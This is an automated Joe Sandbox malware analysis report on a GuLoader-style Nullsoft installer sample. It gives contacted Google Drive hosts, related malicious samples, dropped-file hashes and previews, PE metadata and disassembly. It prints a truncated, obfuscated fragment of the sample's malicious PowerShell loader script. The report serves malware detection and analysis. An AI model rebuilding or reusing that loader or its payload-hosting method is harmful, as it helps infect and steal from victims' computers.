00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://apis.google.commsiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/hmsiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055912606.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1839618822.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.usercontent.google.com/2msiexec.exe, 00000005.00000003.2502788314.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://drive.usercontent.google.com/jdmsiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://drive.google.com/ificatemsiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        142.250.181.1
                                                                        drive.usercontent.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        172.217.19.174
                                                                        drive.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1567521
                                                                        Start date and time:2024-12-03 16:41:57 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 31s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:10
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:AwMu7gR48D.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:6f4acfdbac861233f66afa46e67b349354826d039a367314f28f13fd7bfa5287.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@6/14@2/2
                                                                        EGA Information:
                                                                        • Successful, ratio: 33.3%
                                                                        HCA Information:
                                                                        • Successful, ratio: 94%
                                                                        • Number of executed functions: 67
                                                                        • Number of non-executed functions: 25
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6076 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • VT rate limit hit for: AwMu7gR48D.exe
                                                                        TimeTypeDescription
                                                                        10:43:01API Interceptor40x Sleep call for process: powershell.exe modified
                                                                        10:43:51API Interceptor13x Sleep call for process: msiexec.exe modified
                                                                        No context
                                                                        No context
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        37f463bf4616ecd445d4a1937da06e19NX6BOqyG3J.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        beNxougDFV.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        REQUEST FOR QUOATION AND PRICES.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        Curri.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        36244920cQPUT1.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 142.250.181.1
                                                                        • 172.217.19.174
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dllbeNxougDFV.exeGet hashmaliciousGuLoaderBrowse
                                                                          C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dllbeNxougDFV.exeGet hashmaliciousGuLoaderBrowse
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):14744
                                                                            Entropy (8bit):4.992175361088568
                                                                            Encrypted:false
                                                                            SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                            MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                            SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                            SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                            SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\Desktop\AwMu7gR48D.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4096
                                                                            Entropy (8bit):3.6614996787412575
                                                                            Encrypted:false
                                                                            SSDEEP:48:qYGZ0Gtq/oaPybCQ1hsIqXA1AfsgsfbLwGXwaEvRugYy/ImBmrm:wDAoyXAykgEUGAaGRuRm
                                                                            MD5:245AC30568C8703531FC4E64B321BE16
                                                                            SHA1:BADD01A31FC2B8CC050A1DC3489FC8F620C450F7
                                                                            SHA-256:B91763928CE210BFC0A43B0AC1178D68CB95CFAD68439B25B55A53B7AA53B207
                                                                            SHA-512:9A81F2DE2CC41F6E35498B04B6327ADCFF268523F7B6A9EA9D5CFA1B2CF0425E59A121C99F0A0251C3380886CC058E88DE8A12B17E049D5FD5D7EEB0C956F083
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: beNxougDFV.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.............................. ......0#......Rich............................PE..L.....uY...........!......................... ...............................P......................................."..h...l ..<............................@....................................................... ..l............................text...g........................... ..`.rdata..(.... ......................@..@.data...<....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\AwMu7gR48D.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4096
                                                                            Entropy (8bit):3.286321681873388
                                                                            Encrypted:false
                                                                            SSDEEP:48:qK64n2rZ4vuXXqQr1wH+zL/o0o/X/3MVyjlZSC15gaoFU:5P4ZxKQruHkJwvcVyV4FU
                                                                            MD5:200E4D67E7A08D4C92F05E31442095FE
                                                                            SHA1:1D0492FDFB7C0C8799AEA7982DA8B4EFEDE7581B
                                                                            SHA-256:01D867E3A1F0AEC39A4FF02FE9FAFEFC78D6A12390A0DA8ECBF4E7DA5379E42E
                                                                            SHA-512:620AB7A94E4EE965C159CC1A5F2ADC2CC6616CFB738EA191EAB404B249D21DD19134A314A21315F4EE2C0A75FD5062D1BF353BB75B877A61171F27F4A87CF995
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: beNxougDFV.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L.....uY...........!................i........ ...............................P...................................... "......L ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...x....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Category:dropped
                                                                            Size (bytes):500524
                                                                            Entropy (8bit):7.632562248014631
                                                                            Encrypted:false
                                                                            SSDEEP:12288:SpC1NSIUW2qjUT8IiMGQb7jYF+Xg0x1Odt3xD:eC1UabQb2+XPMV
                                                                            MD5:E910DD39A106DFB09F31945608899357
                                                                            SHA1:3C769E1093522DAF75C7425413A5D44DD3F29F7F
                                                                            SHA-256:6F4ACFDBAC861233F66AFA46E67B349354826D039A367314F28F13FD7BFA5287
                                                                            SHA-512:EE160A5DF59B154AD96DCF11862098A09D0502C8C7C78DF2484A3CBD93DA21C9A2EA4A79DA3800AC38544B3217889F55D877CC70B86F71B43E87C9DCE9125170
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...#.uY.................`...........1.......p....@.......................................@.................................(t.......0...W...........................................................................p...............................text....^.......`.................. ..`.rdata..H....p.......d..............@..@.data................x..............@....ndata.......@...........................rsrc....W...0...X...|..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                            Process:C:\Users\user\Desktop\AwMu7gR48D.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):134563
                                                                            Entropy (8bit):1.2420304589895552
                                                                            Encrypted:false
                                                                            SSDEEP:768:JTXI/LYa4cD2ujQzIsqIoMEJ8owrALEXMFrDwh0aHlC++KDTvfO/Ky:EnVS+r9brkwN/
                                                                            MD5:E6066CC79780E021C55CDC3EF8FC82CC
                                                                            SHA1:FADDF02F672BEA8C3A766FB42F1FDC365934ED50
                                                                            SHA-256:ED56062F4EA903C040602E4F50BB0F88A5E5DAC8F9F50A608D0495347C1003B8
                                                                            SHA-512:1F856CE5664BA5BC3914ACE73BDF0F0EBD419A5162890F9E7F66A9878DA9ACDDE9E24A42DDCE4ADAC7014F41F4C54977D9754DC867A9570B6A7BCAB757FC53F7
                                                                            Malicious:false
                                                                            Preview:...................................~.................j.....................................................q-....................................................................M................n..O%....H............................4..=......................z..................j.............................................'..............T.M..............!.................................................................................x.....................{..............R..............................................&..........h..............0...............................................................D...................................................................................................................................(..........................................................................E...........`.....=......................n.............................!...g................................#.........................................................................
                                                                            Process:C:\Users\user\Desktop\AwMu7gR48D.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):347357
                                                                            Entropy (8bit):1.2510537828861161
                                                                            Encrypted:false
                                                                            SSDEEP:768:7wNmQThgiCB7GJHZUFVJPaSenNvSIpJjRuermO9c3NMRzgJrawa1+VWzoIk33SnI:Agcs7GTR7EvgE
                                                                            MD5:10C53FA2ADD5E04A7C257241470F8B30
                                                                            SHA1:F280F7414C749DA2A84EAC4DF1AD18B623325CF8
                                                                            SHA-256:E27733521BB45F4719C1FFFB5D0D9262E8BAA510C52E7EC880612464E5889685
                                                                            SHA-512:CF23EA9FB2316C67A1AAA7DCEFD48728F9DBC17E2413867EBFEB443F2EE7CF0BCFCF00F2FAF094A56779FEAE27D14E7408D629E0DF4EF7A8D2CF4FAFA1EBF2D0
                                                                            Malicious:false
                                                                            Preview:.........[......*....................................................`..........x.......................................#......A..........................................t....................&.....................y...............................................................................................................................h...............K.........................................................................s......................S.........................n.....`...................................................................................J..a.............;.........................x.....................e.........6.....................?.......................................................U.....c.......................A...........................................................|..............................................=............................L...........p..f.......]..................E................................................................v...
                                                                            Process:C:\Users\user\Desktop\AwMu7gR48D.exe
                                                                            File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 164
                                                                            Category:dropped
                                                                            Size (bytes):4242
                                                                            Entropy (8bit):1.1689000520156396
                                                                            Encrypted:false
                                                                            SSDEEP:24:3X9EQjC0f2xlR8XA8f+6mqZVN//sTqYiegGDXMTTO1zlvyQ:nbpexne/+UfNXsNiSCTOPvh
                                                                            MD5:7F09DBB1E7A421C1C43B98C594A1F1EE
                                                                            SHA1:5E541763EFD79D7005668B908BE438412E042CBD
                                                                            SHA-256:20F7314F0A64579C20FFBAC8DE67F9D36FD4824F5C64DC01D89F5FF4908BCDC5
                                                                            SHA-512:B901933CD173EDC42828FCC6CCA5B4A4BC29FD0F0ADD0AE08BE56BBF1D24781C542C8CE99142069287C976F6E8059D5ACD95FEA8D54427D9B02F74765352AAF5
                                                                            Malicious:false
                                                                            Preview:.......................%............................................................U............W......Z.............;.................Q...........................s.......................................E.............................................z...............................M..........P...................................<........u.............................w................c.........................................I...................................k........?................................}.................$..................'..=2.......G..h...?.....................................................................|................................................ ............hj..............................................-............+...................................R....h.........................._.!....R........................".................................Q&<...............................J........N.......................................d..........................5
                                                                            Process:C:\Users\user\Desktop\AwMu7gR48D.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):300506
                                                                            Entropy (8bit):7.692220351018027
                                                                            Encrypted:false
                                                                            SSDEEP:6144:zZvgBKxTIdbvFjs3a9xjEKBfFMGUpDLVYdXpzDLzwJbv:1MyIdbvFjAaZd4pdYd5rEz
                                                                            MD5:A7D0573E705AE64868B5ED90C1F98F36
                                                                            SHA1:B472C3F5005EADB55EBA9E94E3D9304FB52A4E55
                                                                            SHA-256:0E2EC7016374868C6E0106E93E6F11F1B3760D1960C4C64BF1F247149B529B11
                                                                            SHA-512:F466FCC96FFF33E5B857FB1C52FABEA4A83A153E2CC1CEC66F5EBCA8C0E4E61C5F996B162A803BC9AB11BEA376A0B80E99479C19AC83F797339E1458C345EB13
                                                                            Malicious:false
                                                                            Preview:.............QQQQ.....'.`.............e..y...........DDDD..{{{.XXXX....||...q......PP............aaa.....9..F..................'.....EEEEE.........u.....q...,,,........................."".........YY..............fff.................s..........yyyy..II.....................Q..........\.................\...................../....................m....xxx.""...........//.VV..,.............T....................4.----.....a..........{{{.................c............................................................................b..OO...gggg..........v...........))...........................#........................s.9..............H.......J._______............y...............................~..:...b...A...............3........P.......ttttttt.....22....##.......u......<<.................................BBB.......C....$$$..........C..........???.....n.bbbb...".........K...........HH.................,.QQQQ.EE.. .....................x.}....bbbbb.......................#...... ..aaaa..............
                                                                            Process:C:\Users\user\Desktop\AwMu7gR48D.exe
                                                                            File Type:ASCII text, with very long lines (3197), with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):54203
                                                                            Entropy (8bit):5.360158731620854
                                                                            Encrypted:false
                                                                            SSDEEP:1536:425QJQG/9WajWVxaSroT6LaGfmTjGvS+PSkk50:42SJQGFWajUEIoTKuTjGvSCSkk50
                                                                            MD5:FD7918A6EE70CC9B6203E20A28EFBBFB
                                                                            SHA1:91DB810F8FF57349AFF7FED57D18801167726590
                                                                            SHA-256:041651F5B0B965C2F827E167954F7FA689270887D3E13E79D9C13EAEE9E6857D
                                                                            SHA-512:C5B0A146BB814259385DFC6DE10E76ED4819D041F568E5E40369CC281039B19BA6DC32A480E353F819BAFB488481F8EC7D50D38EB4F418FC113E60ECBC136B9D
                                                                            Malicious:true
                                                                            Preview:$Cathja=$tvangssituationernes;..<#Gurgulio Flotillernes Autocollimate Stiklingeformering Combatant Rhabdomancy #>..<#Countereffects Elskelig Tereus Laguners Calyptraea Untholeably Hjemmelsret #>..<#Elfrede Unapplicative Capsuliferous Fadderens Togaers Goys #>..<#Oprundet overstterteoriens Strumming Gavnedes #>..<#Gynaeolatry falkehjerte Provivisection Kollektivets Proscind Klavern #>..<#Pyralidoidea Praxeology Tionontati Midsommerfesternes Affindelsessummernes Pentecostalism #>...$Corpuscules = @'.A ces.Teltp$BegedMOr,eny BalasNatu obicosgSemityTutornTreaci ikks St nmHa,vt= Prop$BevisMConstoPaabebAftvisCorne;Kronp.DenunfNeighuApplinGroomc SmedtDi.hyi morpoS illnRethi KoloT PalmaPrecae WorkmRegnemTrawleli ent Peno Sadd(Lrerf$BetjeT Br grGenneeHousetFakt tBlyine,oncenBal,iaAdrenaForklrpeastsAfbrndSub eabornegTroph,Vandr$PesteG SobeeBellen Ba.bnMo soe Ud,amRebreb edyeaOverogBitnittran eUagts) Viki Th.b{Inde..Korru.Sndag$F,ibrUP,nnynuoverfPivs aStolpitid,slAtriuiengron CortgGlyphnBj.ge
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):7.632562248014631
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:AwMu7gR48D.exe
                                                                            File size:500'524 bytes
                                                                            MD5:e910dd39a106dfb09f31945608899357
                                                                            SHA1:3c769e1093522daf75c7425413a5d44dd3f29f7f
                                                                            SHA256:6f4acfdbac861233f66afa46e67b349354826d039a367314f28f13fd7bfa5287
                                                                            SHA512:ee160a5df59b154ad96dcf11862098a09d0502c8c7c78df2484a3cbd93da21c9a2ea4a79da3800ac38544b3217889f55d877cc70b86f71b43e87c9dce9125170
                                                                            SSDEEP:12288:SpC1NSIUW2qjUT8IiMGQb7jYF+Xg0x1Odt3xD:eC1UabQb2+XPMV
                                                                            TLSH:D9B40261BA50E4D6C83B46B576B3DC3129143DAB837251BF27A837EE5062273050BDAF
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...#.uY.................`.........
                                                                            Icon Hash:246445471b4f0f1f
                                                                            Entrypoint:0x4031bb
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x59759523 [Mon Jul 24 06:35:15 2017 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                                                                            Instruction
                                                                            sub esp, 00000184h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor ebx, ebx
                                                                            push 00008001h
                                                                            mov dword ptr [esp+18h], ebx
                                                                            mov dword ptr [esp+10h], 00409198h
                                                                            mov dword ptr [esp+20h], ebx
                                                                            mov byte ptr [esp+14h], 00000020h
                                                                            call dword ptr [004070A0h]
                                                                            call dword ptr [0040709Ch]
                                                                            and eax, BFFFFFFFh
                                                                            cmp ax, 00000006h
                                                                            mov dword ptr [0042370Ch], eax
                                                                            je 00007F2D450B35A3h
                                                                            push ebx
                                                                            call 00007F2D450B665Ah
                                                                            cmp eax, ebx
                                                                            je 00007F2D450B3599h
                                                                            push 00000C00h
                                                                            call eax
                                                                            mov esi, 00407298h
                                                                            push esi
                                                                            call 00007F2D450B65D6h
                                                                            push esi
